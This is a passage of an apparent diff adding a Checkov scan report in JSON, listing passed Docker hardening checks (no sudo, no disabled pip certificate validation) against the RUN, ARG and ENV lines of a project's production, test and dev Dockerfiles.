31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-dont-use-sudo", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_1", + "bc_check_id": null, + "check_name": "Ensure that sudo isn't used", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-dont-use-sudo", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_1", + "bc_check_id": null, + "check_name": "Ensure that sudo isn't used", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-dont-use-sudo", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_1", + "bc_check_id": null, + "check_name": "Ensure that sudo isn't used", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-dont-use-sudo", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_1", + "bc_check_id": null, + "check_name": "Ensure that sudo isn't used", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-dont-use-sudo", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_API_URL\n", + "value": "NEXT_PUBLIC_API_URL", + "__startline__": 11, + "__endline__": 11 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_API_URL\n", + "value": "NEXT_PUBLIC_API_URL", + "__startline__": 11, + "__endline__": 11, + "resource_type": "ARG", + "hash": "fded00a21c81cd45d8985324636a2acafc73bef594a45811ca0d68265da3f9dc" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 12, + "ARG NEXT_PUBLIC_API_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 12, + 12 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_MARKETPLACE_URL\n", + "value": "NEXT_PUBLIC_MARKETPLACE_URL", + "__startline__": 12, + "__endline__": 12 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_MARKETPLACE_URL\n", + "value": "NEXT_PUBLIC_MARKETPLACE_URL", + "__startline__": 12, + "__endline__": 12, + "resource_type": "ARG", + "hash": "11d98758a432fc03021573afe4df769dc34ff0a4aec966f558b5e00c71c6cf3b" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 13, + "ARG NEXT_PUBLIC_MARKETPLACE_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 13, + 13 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_DASHBOARD_URL\n", + "value": "NEXT_PUBLIC_DASHBOARD_URL", + "__startline__": 13, + "__endline__": 13 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_DASHBOARD_URL\n", + "value": "NEXT_PUBLIC_DASHBOARD_URL", + "__startline__": 13, + "__endline__": 13, + "resource_type": "ARG", + "hash": "4075db881e0d222faeb86e03db8a05d9a998deab344c05aee0e89d2426e01383" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 14, + "ARG NEXT_PUBLIC_DASHBOARD_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 14, + 14 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_ADMIN_URL", + "__startline__": 14, + "__endline__": 14 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_ADMIN_URL", + "__startline__": 14, + "__endline__": 14, + "resource_type": "ARG", + "hash": "a4c9bf1c4e349946074fb4c606d0db63c06a809d125e58ddd09427e4d929fd6a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 15, + "ARG NEXT_PUBLIC_ADMIN_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 15, + 15 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ENV", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL", + "__startline__": 15, + "__endline__": 18 + }, + "label_": "resource: ENV", + "id_": "ENV", + "source_": "Dockerfile", + "content": "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL", + "__startline__": 15, + "__endline__": 18, + "resource_type": "ENV", + "hash": "65abe3eb0aadfa3b1ed513b9e21f4f8c4524ec8c298e7123de46806870b90557" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 16, + "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n" + ], + [ + 17, + " NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n" + ], + [ + 18, + " NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n" + ], + [ + 19, + " NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 16, + 19 + ], + "resource": "/Dockerfile.production.ENV", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ENV", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ENV NODE_ENV=production\n", + "value": "NODE_ENV=production", + "__startline__": 28, + "__endline__": 28 + }, + "label_": "resource: ENV", + "id_": "ENV", + "source_": "Dockerfile", + "content": "ENV NODE_ENV=production\n", + "value": "NODE_ENV=production", + "__startline__": 28, + "__endline__": 28, + "resource_type": "ENV", + "hash": "5a6afcff0e4c111b04ace6d372feb2943096034796456739be650482e87f3e0e" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 29, + "ENV NODE_ENV=production\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 29, + 29 + ], + "resource": "/Dockerfile.production.ENV", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ENV", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "ENV NODE_ENV=test\n", + "value": "NODE_ENV=test", + "__startline__": 12, + "__endline__": 12 + }, + "label_": "resource: ENV", + "id_": "ENV", + "source_": "Dockerfile", + "content": "ENV NODE_ENV=test\n", + "value": "NODE_ENV=test", + "__startline__": 12, + "__endline__": 12, + "resource_type": "ENV", + "hash": 